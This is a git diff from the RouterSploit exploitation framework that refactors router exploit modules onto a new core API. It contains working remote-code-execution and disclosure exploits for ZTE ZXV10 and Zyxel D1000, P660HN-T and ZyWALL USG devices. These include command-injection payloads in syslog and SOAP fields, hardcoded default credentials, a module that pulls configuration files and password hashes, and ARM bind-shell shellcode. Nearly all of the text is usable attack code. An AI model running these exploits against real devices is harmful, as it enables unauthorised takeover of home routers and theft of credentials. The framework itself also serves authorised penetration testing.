b/routersploit/modules/exploits/routers/zte/zxv10_rce.py index cf8790860..2b7d171b1 100644 --- a/routersploit/modules/exploits/routers/zte/zxv10_rce.py +++ b/routersploit/modules/exploits/routers/zte/zxv10_rce.py @@ -1,45 +1,32 @@ import re import time import requests +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - mute, - validators, - print_error, - print_success, - print_status, - shell, - http_request, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for ZTE ZXV10 H108L remote code execution vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ + +class Exploit(HTTPClient): __info__ = { - 'name': 'ZTE ZXV10 RCE', - 'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability ' - 'that allows executing commands on operating system level.', - 'authors': [ - 'Anastasios Stasinopoulos', # vulnerabiltiy discovery - 'Marcin Bury ', # routersploit module + "name": "ZTE ZXV10 RCE", + "description": "Exploits ZTE ZXV10 H108L remote code execution vulnerability " + "that allows executing commands on operating system level.", + "authors": [ + "Anastasios Stasinopoulos", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://github.com/stasinopoulos/ZTExploit/', + "references": [ + "https://github.com/stasinopoulos/ZTExploit/", ], - 'devices': [ - 'ZTE ZXV10 H108L', + "devices": [ + "ZTE ZXV10 H108L", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('root', 'Username to log in with') - password = exploits.Option('W!n0&oO7.', 'Password to log in with') + username = OptString("root", "Username to log in with") + password = OptString("W!n0&oO7.", "Password to log in with") def __init__(self): self.session = requests.Session() @@ -50,10 +37,7 @@ def run(self): self.info() print_status("Invoking command loop") - shell(self, - architecture="mipsbe", - method="wget", - location="/tmp") + shell(self, architecture="mipsbe", method="wget", location="/tmp") else: print_error("Exploit failed - target seems to be not vulnerable") @@ -63,11 +47,18 @@ def execute(self, cmd): "DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd) url = "{}:{}{}".format(self.target, self.port, path) try: - response = http_request("GET", url, self.session) + response = self.http_request( + method="GET", + path=path, + session=self.session + ) time.sleep(3) - url = "{}:{}/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch".format(self.target, self.port) - response = http_request("GET", url, self.session) + response = self.http_request( + method="GET", + path="/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch", + session=self.session + ) time.sleep(1) res = re.findall(r'textarea_1">(.*) -c', response.text) @@ -82,17 +73,19 @@ def execute(self, cmd): res = res1 + res2 if res[0] != "": return res[0] - except Exception: + except: pass return "" def info(self): - url = "{}:{}/template.gch".format(self.target, self.port) - try: - response = http_request("GET", url, self.session) - except Exception: + response = self.http_request( + method="GET", + path="/template.gch", + session=self.session + ) + except: return # Check for Model Name @@ -116,10 +109,12 @@ def info(self): print_status("Boot Loader Version: {}".format(Frm_BootVer[0])) def login(self): - url = "{}:{}/".format(self.target, self.port) - try: - response = http_request("GET", url, self.session) + response = self.http_request( + method="GET", + path="/", + session=self.session + ) if response is None: return @@ -130,19 +125,22 @@ def login(self): Frm_Logintoken = Frm_Logintoken[0] print_status("Trying to log in with credentials {} : {}".format(self.username, self.password)) - url = "{}:{}/login.gch".format(self.target, self.port) - - data = {"Frm_Logintoken": Frm_Logintoken, - "Username": self.username, - "Password": self.password} - - response = http_request("POST", url, self.session, data=data) - if "Username" not in response.text \ - and "Password" not in response.text \ - and response.status_code != 404: + data = { + "Frm_Logintoken": Frm_Logintoken, + "Username": self.username, + "Password": self.password + } + + response = self.http_request( + method="POST", + path="/login.gch", + session=self.session, + data=data + ) + if "Username" not in response.text and "Password" not in response.text: print_success("Successful authentication") return True - except Exception: + except: pass return False diff --git a/routersploit/modules/exploits/routers/zyxel/d1000_rce.py b/routersploit/modules/exploits/routers/zyxel/d1000_rce.py index b0bee06a4..d7cc4e863 100644 --- a/routersploit/modules/exploits/routers/zyxel/d1000_rce.py +++ b/routersploit/modules/exploits/routers/zyxel/d1000_rce.py @@ -1,40 +1,28 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Zyxel/Eir D1000 Remote Command Execution vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Zyxel Eir D1000 RCE', - 'description': 'Module exploits Remote Command Execution vulnerability in Zyxel/Eir D1000 devices.' - 'If the target is vulnerable it allows to execute commands on operating system level.', - 'authors': [ - 'kenzo', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/', - 'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759', - 'https://broadband-forum.org/technical/download/TR-064.pdf', - ], - 'devices': [ - 'Zyxel EIR D1000', - ], + "name": "Zyxel Eir D1000 RCE", + "description": "Module exploits Remote Command Execution vulnerability in Zyxel/Eir D1000 devices. " + "If the target is vulnerable it allows to execute commands on operating system level.", + "authors": ( + "kenzo", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/", + "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759", + "https://broadband-forum.org/technical/download/TR-064.pdf", + ), + "devices": ( + "Zyxel EIR D1000", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(7547, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1") + port = OptPort(7547, 'Target HTTP port') def run(self): if self.check(): @@ -46,9 +34,10 @@ def run(self): print_error("Target seems to be not vulnerable") def execute(self, cmd): - url = "{}:{}/UD/act?1".format(self.target, self.port) - headers = {"Content-Type": "text/xml", - "SOAPAction": "urn:dslforum-org:service:Time:1#SetNTPServers"} + headers = { + "Content-Type": "text/xml", + "SOAPAction": "urn:dslforum-org:service:Time:1#SetNTPServers" + } data = ("" "" @@ -63,13 +52,21 @@ def execute(self, cmd): " " "").format(cmd) - http_request(method="POST", url=url, headers=headers, data=data) + self.http_request( + method="POST", + path="/UD/act?1", + headers=headers, + data=data, + ) + return "" @mute def check(self): # todo: requires improvement - url = "{}:{}/globe".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/globe" + ) if response is not None: if response.status_code == 404 and "home_wan.htm" in response.text: diff --git a/routersploit/modules/exploits/routers/zyxel/d1000_wifi_password_disclosure.py b/routersploit/modules/exploits/routers/zyxel/d1000_wifi_password_disclosure.py index 9f0a26371..ff899441c 100644 --- a/routersploit/modules/exploits/routers/zyxel/d1000_wifi_password_disclosure.py +++ b/routersploit/modules/exploits/routers/zyxel/d1000_wifi_password_disclosure.py @@ -1,39 +1,27 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - http_request, - mute, - validators, - print_table, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Zyxel/Eir D1000 Password Disclosure vulnerability. - If the target is vulnerable it allows to read WiFi password. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Zyxel Eir D1000 WiFi Password Disclosure', - 'description': 'Module exploits WiFi Password Disclosure vulnerability in Zyxel/Eir D1000 devices.' - 'If the target is vulnerable it allows to read WiFi password.', - 'authors': [ - 'Xiphos http://www.xiphosresearch.com/', # vulnerability discovery, poc exploit - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://github.com/XiphosResearch/exploits/tree/master/tr-06fail', - ], - 'devices': [ - 'Zyxel EIR D1000', - ], + "name": "Zyxel Eir D1000 WiFi Password Disclosure", + "description": "Module exploits WiFi Password Disclosure vulnerability in Zyxel/Eir D1000 devices. " + "If the target is vulnerable it allows to read WiFi password.", + "authors": ( + "Xiphos http://www.xiphosresearch.com/", # vulnerability discovery, poc exploit + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://github.com/XiphosResearch/exploits/tree/master/tr-06fail", + ), + "devices": ( + "Zyxel EIR D1000", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(7547, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1") + port = OptPort(7547, 'Target HTTP port') def run(self): creds = [] @@ -54,18 +42,26 @@ def check(self): return False # target is not vulnerable def get_wifi_key(self): - url = "{}:{}/UD/act?1".format(self.target, self.port) + headers = { + "SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" + } + data = ( + "" + "" + " " + " " + " " + " " + "" + ) - headers = {"SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"} - data = ("" - "" - " " - " " - " " - " " - "") + response = self.http_request( + method="POST", + path="/UD/act?1", + headers=headers, + data=data + ) - response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return None diff --git a/routersploit/modules/exploits/routers/zyxel/p660hn-t_v1_rce.py b/routersploit/modules/exploits/routers/zyxel/p660hn-t_v1_rce.py deleted file mode 100644 index 83db09b82..000000000 --- a/routersploit/modules/exploits/routers/zyxel/p660hn-t_v1_rce.py +++ /dev/null @@ -1,73 +0,0 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Zyxel P660HN-T v1 Remote Command Execution vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ - __info__ = { - 'name': 'Zyxel P660HN-T v1 RCE', - 'description': 'Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices.' - 'If the target is vulnerable it allows to execute commands on operating system level.', - 'authors': [ - 'Pedro Ribeiro ', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'http://seclists.org/fulldisclosure/2017/Jan/40', - 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt', - 'https://blogs.securiteam.com/index.php/archives/2910' - ], - 'devices': [ - 'Zyxel P660HN-T v1', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target port', validators=validators.integer) - - def run(self): - if self.check(): - print_success("Target appears to be vulnerable") - print_status("Invoking command loop...") - print_status("It is blind command injection - response is not available") - shell(self, architecture="mipsbe") - else: - print_error("Target seems to be not vulnerable") - - def execute(self, cmd): - url = "{}:{}/cgi-bin/ViewLog.asp".format(self.target, self.port) - - payload = ";{};#".format(cmd) - data = {"remote_submit_Flag": "1", - "remote_syslog_Flag": "1", - "RemoteSyslogSupported": "1", - "LogFlag": "0", - "remote_host": payload, - "remoteSubmit": "Save"} - - http_request(method="POST", url=url, data=data) - - return "" - - @mute - def check(self): - url = "{}:{}/cgi-bin/authorize.asp".format(self.target, self.port) - response = http_request(method="GET", url=url) - if response is None: - return False - - if "ZyXEL P-660HN-T1A" in response.text: - return True - - return False diff --git a/routersploit/modules/exploits/routers/zyxel/p660hn-t_v2_rce.py b/routersploit/modules/exploits/routers/zyxel/p660hn-t_v2_rce.py deleted file mode 100644 index 74eaafa4e..000000000 --- a/routersploit/modules/exploits/routers/zyxel/p660hn-t_v2_rce.py +++ /dev/null @@ -1,96 +0,0 @@ -import base64 - -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Zyxel P660HN-T V2 Remote Command Execution vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ - __info__ = { - 'name': 'Zyxel P660HN-T v2 RCE', - 'description': 'Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T V2 devices.' - 'If the target is vulnerable it allows to execute commands on operating system level.', - 'authors': [ - 'Pedro Ribeiro ', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'http://seclists.org/fulldisclosure/2017/Jan/40', - 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt', - 'https://blogs.securiteam.com/index.php/archives/2910' - ], - 'devices': [ - 'Zyxel P660HN-T v2', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - - username = exploits.Option('supervisor', 'Username for the web interface') - password = exploits.Option('zyad1234', 'Password for the web interface') - - session = None - - def run(self): - if self.check(): - print_success("Target appears to be vulnerable") - print_status("Invoking command loop...") - print_status("It is blind command injection - response is not available. Command length up to 28 characters.") - shell(self, architecture="mipsbe") - else: - print_error("Target seems to be not vulnerable") - - def execute(self, cmd): - url = "{}:{}/cgi-bin/pages/maintenance/logSetting/logSet.asp".format(self.target, self.port) - - payload = "1.1.1.1`{}`&#".format(cmd) - data = { - "logSetting_H": "1", - "active": "1", - "logMode": "LocalAndRemote", - "serverPort": "123", - "serverIP": payload - } - - http_request(method="POST", url=url, data=data, session=self.session) - return "" - - @mute - def check(self): - url = "{}:{}/js/Multi_Language.js".format(self.target, self.port) - response = http_request(method="GET", url=url) - if response is None: - return False - - if "P-660HN-T1A_IPv6" in response.text: - return True - - return False - - def login(self): - credentials = base64.encode("{}:{}".format(self.username, self.password)) - url = "{}:{}/cgi-bin/index.asp?" + credentials - - data = { - "Loginuser": "supervisor", - "Prestige_Login": "Login" - } - - response = http_request(method="POST", url=url, data=data, session=self.session) - - if response is not None and response.status_code == 200: - return True - - return False diff --git a/routersploit/modules/exploits/routers/zyxel/p660hn_t_v1_rce.py b/routersploit/modules/exploits/routers/zyxel/p660hn_t_v1_rce.py new file mode 100644 index 000000000..a9b457702 --- /dev/null +++ b/routersploit/modules/exploits/routers/zyxel/p660hn_t_v1_rce.py @@ -0,0 +1,67 @@ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Zyxel P660HN-T v1 RCE", + "description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. " + "If the target is vulnerable it allows to execute commands on operating system level.", + "authors": ( + "Pedro Ribeiro ", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "http://seclists.org/fulldisclosure/2017/Jan/40", + "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt", + "https://blogs.securiteam.com/index.php/archives/2910", + ), + "devices": ( + "Zyxel P660HN-T v1", + ), + } + + target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1") + port = OptPort(80, "Target port") + + def run(self): + if self.check(): + print_success("Target appears to be vulnerable") + print_status("Invoking command loop...") + print_status("It is blind command injection - response is not available") + shell(self, architecture="mipsbe") + else: + print_error("Target seems to be not vulnerable") + + def execute(self, cmd): + payload = ";{};#".format(cmd) + data = { + "remote_submit_Flag": "1", + "remote_syslog_Flag": "1", + "RemoteSyslogSupported": "1", + "LogFlag": "0", + "remote_host": payload, + "remoteSubmit": "Save" + } + + self.http_request( + method="POST", + path="/cgi-bin/ViewLog.asp", + data=data + ) + + return "" + + @mute + def check(self): + response = self.http_request( + method="GET", + path="/cgi-bin/authorize.asp", + ) + if response is None: + return False + + if "ZyXEL P-660HN-T1A" in response.text: + return True + + return False diff --git a/routersploit/modules/exploits/routers/zyxel/p660hn_t_v2_rce.py b/routersploit/modules/exploits/routers/zyxel/p660hn_t_v2_rce.py new file mode 100644 index 000000000..02b2b92c2 --- /dev/null +++ b/routersploit/modules/exploits/routers/zyxel/p660hn_t_v2_rce.py @@ -0,0 +1,96 @@ +import base64 +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Zyxel P660HN-T v2 RCE", + "description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T V2 devices. " + "If the target is vulnerable it allows to execute commands on operating system level.", + "authors": ( + "Pedro Ribeiro ", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "http://seclists.org/fulldisclosure/2017/Jan/40", + "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt", + "https://blogs.securiteam.com/index.php/archives/2910", + ), + "devices": ( + "Zyxel P660HN-T v2", + ), + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + username = OptString('supervisor', 'Username for the web interface') + password = OptString('zyad1234', 'Password for the web interface') + + def __init__(self): + self.session = None + + def run(self): + if self.check(): + print_success("Target appears to be vulnerable") + print_status("Invoking command loop...") + print_status("It is blind command injection - response is not available. Command length up to 28 characters.") + shell(self, architecture="mipsbe") + else: + print_error("Target seems to be not vulnerable") + + def execute(self, cmd): + payload = "1.1.1.1`{}`&#".format(cmd) + data = { + "logSetting_H": "1", + "active": "1", + "logMode": "LocalAndRemote", + "serverPort": "123", + "serverIP": payload + } + + self.http_request( + method="POST", + path="/cgi-bin/pages/maintenance/logSetting/logSet.asp", + data=data, + session=self.session + ) + + return "" + + @mute + def check(self): + response = self.http_request( + method="GET", + path="/js/Multi_Language.js" + ) + + if response is None: + return False + + if "P-660HN-T1A_IPv6" in response.text: + return True + + return False + + def login(self): + credentials = base64.encode("{}:{}".format(self.username, self.password)) + url = "/cgi-bin/index.asp?" + credentials + + data = { + "Loginuser": "supervisor", + "Prestige_Login": "Login" + } + + response = self.http_request( + method="POST", + path=path, + data=data, + session=self.session + ) + + if response is not None and response.status_code == 200: + return True + + return False diff --git a/routersploit/modules/exploits/routers/zyxel/zywall_usg_extract_hashes.py b/routersploit/modules/exploits/routers/zyxel/zywall_usg_extract_hashes.py index b2d856a77..66d7f7808 100644 --- a/routersploit/modules/exploits/routers/zyxel/zywall_usg_extract_hashes.py +++ b/routersploit/modules/exploits/routers/zyxel/zywall_usg_extract_hashes.py @@ -1,50 +1,40 @@ import re -from routersploit import ( - exploits, - print_error, - print_status, - print_table, - print_success, - http_request, - mute, - validators -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export. - If the tharget is vulnerable it allows to download configuration files which contains sensitive data like password hashes, firewall rules and other network related configurations. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Zyxel ZyWALL USG Extract Hashes', - 'description': 'Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export.' - 'If the tharget is vulnerable it allows to download configuration files which contains sensitive data like password hashes, firewall rules and other network related configurations.', - 'authors': [ - 'RedTeam Pentesting', # vulnerability discovery - ], - 'references': [ - 'https://www.exploit-db.com/exploits/17244/', - ], - 'devices': [ - 'ZyXEL ZyWALL USG-20', - 'ZyXEL ZyWALL USG-20W', - 'ZyXEL ZyWALL USG-50', - 'ZyXEL ZyWALL USG-100', - 'ZyXEL ZyWALL USG-200', - 'ZyXEL ZyWALL USG-300', - 'ZyXEL ZyWALL USG-1000', - 'ZyXEL ZyWALL USG-1050' - 'ZyXEL ZyWALL USG-2000' - ], + "name": "Zyxel ZyWALL USG Extract Hashes", + "description": "Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export. " + "If the tharget is vulnerable it allows to download configuration files which contains " + "sensitive data like password hashes, firewall rules and other network related configurations.", + "authors": ( + "RedTeam Pentesting", # vulnerability discovery + ), + "references": ( + "https://www.exploit-db.com/exploits/17244/", + ), + "devices": ( + "ZyXEL ZyWALL USG-20", + "ZyXEL ZyWALL USG-20W", + "ZyXEL ZyWALL USG-50", + "ZyXEL ZyWALL USG-100", + "ZyXEL ZyWALL USG-200", + "ZyXEL ZyWALL USG-300", + "ZyXEL ZyWALL USG-1000", + "ZyXEL ZyWALL USG-1050", + "ZyXEL ZyWALL USG-2000", + ), } + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(443, "Target HTTP port") + ssl = OptBool("true", "SSL enabled: true/false") - target = exploits.Option('', 'Target address e.g. https://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(443, 'Target port') # default port - script_content = None + def __init__(self): + self.script_content = None def run(self): - if self.check(): print_success("Target appears to be vulnerable") @@ -65,8 +55,11 @@ def run(self): @mute def check(self): # todo: requires improvement - url = "{}:{}/cgi-bin/export-cgi/images/?category={}&arg0={}".format(self.target, self.port, 'config', 'startup-config.conf') - response = http_request(method="GET", url=url) + path = "/cgi-bin/export-cgi/images/?category={}&arg0={}".format('config', 'startup-config.conf') + response = self.http_request( + method="GET", + path=path + ) if response is not None and response.status_code == 200: self.script_content = response.text diff --git a/routersploit/modules/generic/__init__.py b/routersploit/modules/generic/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/generic/bluetooth/__init__.py b/routersploit/modules/generic/bluetooth/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/generic/bluetooth/btle_enumerate.py b/routersploit/modules/generic/bluetooth/btle_enumerate.py new file mode 100644 index 000000000..2af261141 --- /dev/null +++ b/routersploit/modules/generic/bluetooth/btle_enumerate.py @@ -0,0 +1,26 @@ +from routersploit.core.exploit import * +from routersploit.core.bluetooth.btle_client import BTLEClient + + +class Exploit(BTLEClient): + __info__ = { + "name": "Bluetooth LE Enumerate", + "description": "Enumerating services and characteristics of a given " + "Bluetooth Low Energy devices.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/", + ), + } + + target = OptMAC("", "Target MAC address") + + def run(self): + res = self.btle_scan(self.target) + if res: + device = res[0] + + device.print_info() + device.print_services() diff --git a/routersploit/modules/generic/bluetooth/btle_scan.py b/routersploit/modules/generic/bluetooth/btle_scan.py new file mode 100644 index 000000000..4e153586b --- /dev/null +++ b/routersploit/modules/generic/bluetooth/btle_scan.py @@ -0,0 +1,28 @@ +from routersploit.core.exploit import * +from routersploit.core.bluetooth.btle_client import BTLEClient + + +class Exploit(BTLEClient): + __info__ = { + "name": "Bluetooth LE Scan", + "description": "Scans for Bluetooth Low Energy devices.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/", + ), + } + + enum = OptBool("false", "Automatically enumerate services: true/false") + buffering = OptBool("true", "Buffering enabled: true/false. Results in real time.") + + def run(self): + devices = self.btle_scan() + + for device in devices: + if not self.buffering: + device.print_info() + + if self.enum: + device.print_services() diff --git a/routersploit/modules/generic/bluetooth/btle_write.py b/routersploit/modules/generic/bluetooth/btle_write.py new file mode 100644 index 000000000..4a28b8f9b --- /dev/null +++ b/routersploit/modules/generic/bluetooth/btle_write.py @@ -0,0 +1,34 @@ +from routersploit.core.exploit import * +from routersploit.core.bluetooth.btle_client import BTLEClient + + +class Exploit(BTLEClient): + __info__ = { + "name": "Bluetooth LE Write", + "description": "Writes data to target Bluetooth Low Energy device to given " + "characteristic.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/", + ), + } + + target = OptMAC("", "Target MAC address") + char = OptString("", "Characteristic") + data = OptString("41424344", "Data (in hex format)") + buffering = OptBool("true", "Buffering enabled: true/false. Results in real time.") + + + def run(self): + try: + data = bytes.fromhex(self.data) + except ValueError: + print_error("Data is not in valid format") + return + + res = self.btle_scan(self.target) + if res: + device = res[0] + device.write(self.char, data) diff --git a/routersploit/modules/payloads/__init__.py b/routersploit/modules/payloads/__init__.py index e69de29bb..8b1378917 100644 --- a/routersploit/modules/payloads/__init__.py +++ b/routersploit/modules/payloads/__init__.py @@ -0,0 +1 @@ + diff --git a/routersploit/modules/payloads/armle/bind_tcp.py b/routersploit/modules/payloads/armle/bind_tcp.py index 3e839ae02..3844812a3 100644 --- a/routersploit/modules/payloads/armle/bind_tcp.py +++ b/routersploit/modules/payloads/armle/bind_tcp.py @@ -1,5 +1,5 @@ -from routersploit import validators -from routersploit.payloads import ( +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import ( ArchitectureSpecificPayload, Architectures, BindTCPPayloadMixin, @@ -8,84 +8,82 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): __info__ = { - 'name': 'ARMLE Bind TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], + "name": "ARMLE Bind TCP", + "description": "Creates interactive tcp bind shell for ARMLE architecture.", + "authors": ( + "Marcin Bury " # routersploit module + ), } architecture = Architectures.ARMLE def generate(self): - bind_port = validators.convert_port(self.rport) + bind_port = utils.convert_port(self.rport) + return ( - "\x02\x00\xa0\xe3" + - "\x01\x10\xa0\xe3" + - "\x06\x20\xa0\xe3" + - "\x07\x00\x2d\xe9" + - "\x01\x00\xa0\xe3" + - "\x0d\x10\xa0\xe1" + - "\x66\x00\x90\xef" + - "\x0c\xd0\x8d\xe2" + - "\x00\x60\xa0\xe1" + - bind_port[1] + "\x10\xa0\xe3" + - bind_port[0] + "\x70\xa0\xe3" + - "\x01\x1c\xa0\xe1" + - "\x07\x18\x81\xe0" + - "\x02\x10\x81\xe2" + - "\x02\x20\x42\xe0" + - "\x06\x00\x2d\xe9" + - "\x0d\x10\xa0\xe1" + - "\x10\x20\xa0\xe3" + - "\x07\x00\x2d\xe9" + - "\x02\x00\xa0\xe3" + - "\x0d\x10\xa0\xe1" + - "\x66\x00\x90\xef" + - "\x14\xd0\x8d\xe2" + - "\x06\x00\xa0\xe1" + - "\x03\x00\x2d\xe9" + - "\x04\x00\xa0\xe3" + - "\x0d\x10\xa0\xe1" + - "\x66\x00\x90\xef" + - "\x08\xd0\x8d\xe2" + - "\x06\x00\xa0\xe1" + - "\x01\x10\x41\xe0" + - "\x02\x20\x42\xe0" + - "\x07\x00\x2d\xe9" + - "\x05\x00\xa0\xe3" + - "\x0d\x10\xa0\xe1" + - "\x66\x00\x90\xef" + - "\x0c\xd0\x8d\xe2" + - "\x00\x60\xa0\xe1" + - "\x02\x10\xa0\xe3" + - "\x06\x00\xa0\xe1" + - "\x3f\x00\x90\xef" + - "\x01\x10\x51\xe2" + - "\xfb\xff\xff\x5a" + - "\x04\x10\x4d\xe2" + - "\x02\x20\x42\xe0" + - "\x2f\x30\xa0\xe3" + - "\x62\x70\xa0\xe3" + - "\x07\x34\x83\xe0" + - "\x69\x70\xa0\xe3" + - "\x07\x38\x83\xe0" + - "\x6e\x70\xa0\xe3" + - "\x07\x3c\x83\xe0" + - "\x2f\x40\xa0\xe3" + - "\x73\x70\xa0\xe3" + - "\x07\x44\x84\xe0" + - "\x68\x70\xa0\xe3" + - "\x07\x48\x84\xe0" + - "\x73\x50\xa0\xe3" + - "\x68\x70\xa0\xe3" + - "\x07\x54\x85\xe0" + - "\x3e\x00\x2d\xe9" + - "\x08\x00\x8d\xe2" + - "\x00\x10\x8d\xe2" + - "\x04\x20\x8d\xe2" + - "\x0b\x00\x90\xef" + b"\x02\x00\xa0\xe3" + + b"\x01\x10\xa0\xe3" + + b"\x06\x20\xa0\xe3" + + b"\x07\x00\x2d\xe9" + + b"\x01\x00\xa0\xe3" + + b"\x0d\x10\xa0\xe1" + + b"\x66\x00\x90\xef" + + b"\x0c\xd0\x8d\xe2" + + b"\x00\x60\xa0\xe1" + + bind_port[1:2] + b"\x10\xa0\xe3" + + bind_port[0:1] + b"\x70\xa0\xe3" + + b"\x01\x1c\xa0\xe1" + + b"\x07\x18\x81\xe0" + + b"\x02\x10\x81\xe2" + + b"\x02\x20\x42\xe0" + + b"\x06\x00\x2d\xe9" + + b"\x0d\x10\xa0\xe1" + + b"\x10\x20\xa0\xe3" + + b"\x07\x00\x2d\xe9" + + b"\x02\x00\xa0\xe3" + + b"\x0d\x10\xa0\xe1" + + b"\x66\x00\x90\xef" + + b"\x14\xd0\x8d\xe2" + + b"\x06\x00\xa0\xe1" + + b"\x03\x00\x2d\xe9" + + b"\x04\x00\xa0\xe3" + + b"\x0d\x10\xa0\xe1" + + b"\x66\x00\x90\xef" + + b"\x08\xd0\x8d\xe2" + + b"\x06\x00\xa0\xe1" + + b"\x01\x10\x41\xe0" + + b"\x02\x20\x42\xe0" + + b"\x07\x00\x2d\xe9" + + b"\x05\x00\xa0\xe3" + + b"\x0d\x10\xa0\xe1" + + b"\x66\x00\x90\xef" + + b"\x0c\xd0\x8d\xe2" + + b"\x00\x60\xa0\xe1" + + b"\x02\x10\xa0\xe3" + + b"\x06\x00\xa0\xe1" + + b"\x3f\x00\x90\xef" + + b"\x01\x10\x51\xe2" + + b"\xfb\xff\xff\x5a" + + b"\x04\x10\x4d\xe2" + + b"\x02\x20\x42\xe0" + + b"\x2f\x30\xa0\xe3" + + b"\x62\x70\xa0\xe3" + + b"\x07\x34\x83\xe0" + + b"\x69\x70\xa0\xe3" + + b"\x07\x38\x83\xe0" + + b"\x6e\x70\xa0\xe3" + + b"\x07\x3c\x83\xe0" + + b"\x2f\x40\xa0\xe3" + + b"\x73\x70\xa0\xe3" + + b"\x07\x44\x84\xe0" + + b"\x68\x70\xa0\xe3" + + b"\x07\x48\x84\xe0" + + b"\x73\x50\xa0\xe3" + + b"\x68\x70\xa0\xe3" + + b"\x07\x54\x85\xe0" + + b"\x3e\x00\x2d\xe9" + + b"\x08\x00\x8d\xe2" + + b"\x00\x10\x8d\xe2" + 